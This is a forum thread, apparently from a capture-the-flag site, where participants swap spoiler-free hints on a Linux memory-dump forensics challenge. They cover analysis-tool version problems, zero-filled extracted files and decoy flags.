Forget Me Not

@narwhal2 said:

For those having issues with the tool to remember things, check the version you are using. I found it works in 2.6 but not 2.4.

Using 2.6.1, needed to make some adjustments in the tool for it to be able to extract files.

Could someone leave a hint on which file I should be looking at? There are so many files

I’m losing my marbles on this one. I’ve tried the tool on a number of platforms (due to errors) and finally got it running on a fresh Kali VM, using a fork that supposedly addresses the issues I was running into with the stock version. I’m able to extract most of the filesystem, though many (not all) files I’m curious about appear to be zero filled. I’ve also used a separate tool for file carving to see if I missed anything. Still no luck. Anyone willing to lend a nudge?

Ok, tried everything on the extract tool but I still get nothing. I think I will need an hint :neutral:

i found a troll flag too (this_is_not…) - if anyone has any hints for next steps, i’d appreciate it!

I might have forgotten something, but you don’t need to extract any files.

When you go through the information you can get, just make sure you double-check everything against a few different sources. Dont make the mistake I made of googling it and thinking it was a rabbit hole. Look at some other places you can search for that kind of thing which you might use if you were an incident responder.

Well there is like 3 fake flags in this challenge :neutral:

Type your comment> @xInSanity said:

Well there is like 3 fake flags in this challenge :neutral:

Me too, so confused!

This challenge could have been much more interesting or related to a more realistic scenario. It does not happen every day that you can analyze a Linux memory dump obtained in the wild. :neutral:

Hey,

I saw people talking about the version being important. I use 4.6.1. Quite a lot of the files are empty, but not all. Is this expected behaviour? And also, am i just supposed to look in random files for a flag?

@DrDingDong said:

Hey,

I saw people talking about the version being important. I use 4.6.1. Quite a lot of the files are empty, but not all. Is this expected behaviour? And also, am i just supposed to look in random files for a flag?

Not sure what version you mean. There is enough info in the download to build what you need.

You dont need to look in random files. I’d suggest you run some basic analysis and see what it gives you. If you find something interesting, look into what it is.

Frustratingly, I found the thing I needed almost instantly but it then took me days to realise. I could have got blood if I wasn’t an idiot. Don’t be me. Look at what you find.

I mean the version of the tool for analyzing which people refer to having problems with. I got it up and running and can analyze the dump and for example read the usual file which contains stuff about what has been performed. I’ll keep looking, thanks :slight_smile:

@DrDingDong said:

I mean the version of the tool for analyzing which people refer to having problems with. I got it up and running and can analyze the dump and for example read the usual file which contains stuff about what has been performed. I’ll keep looking, thanks :slight_smile:

I think I used version 2.6 or whatever is default in Kali.

You might have seen what you need to see. Look into all the information that gives.

Okay thanks, I’ll look some more :slight_smile:

Thanks to @TazWake for a hint about the very last thing. I do not quite get that very last part. The rest was good fun :slight_smile:

Anyone can help me?
I am stuck in the extract part now. Which PLUGIN should I use to get some useful hints?
All PLUGIN’s were analyzed, but there was no useful information.
Please ping me.

Type your comment> @pouerccat said:

Anyone can help me?
I am stuck in the extract part now. Which PLUGIN should I use to get some useful hints?
All PLUGIN’s were analyzed, but there was no useful information.
Please ping me.

Same here, aargh. Probably overlooking something, as others have said but pretty much stuck.

@Hackdoos said:

Type your comment> @pouerccat said:

Anyone can help me?
I am stuck in the extract part now. Which PLUGIN should I use to get some useful hints?
All PLUGIN’s were analyzed, but there was no useful information.
Please ping me.

Same here, aargh. Probably overlooking something, as others have said but pretty much stuck.

You are almost certainly overlooking it. I did for days on end because it is not obvious and, other than frustration, I cant see a way you would try what you need to do. There is no obvious reason to do it.

So, if you’ve run the plugins you will have a mess of data. Start working through it and be sure you can say you have fully searched it. For example, dont just put things into Google, look at other platforms you might consider as an incident responder.

Dont assume that just because something is generated by what looks like an arbitrary command, it doesn’t mean anything.

I read over the forum, and that was the same way I went.
So you guys say there is the flag, just the noise is too big? I have ideas which way is the best to approach this incident, but I can’t see the flag…

Guys,
the tool we need to use is the usual memory forensic tool V******y right?
what exactly should i start looking for? some file to extract??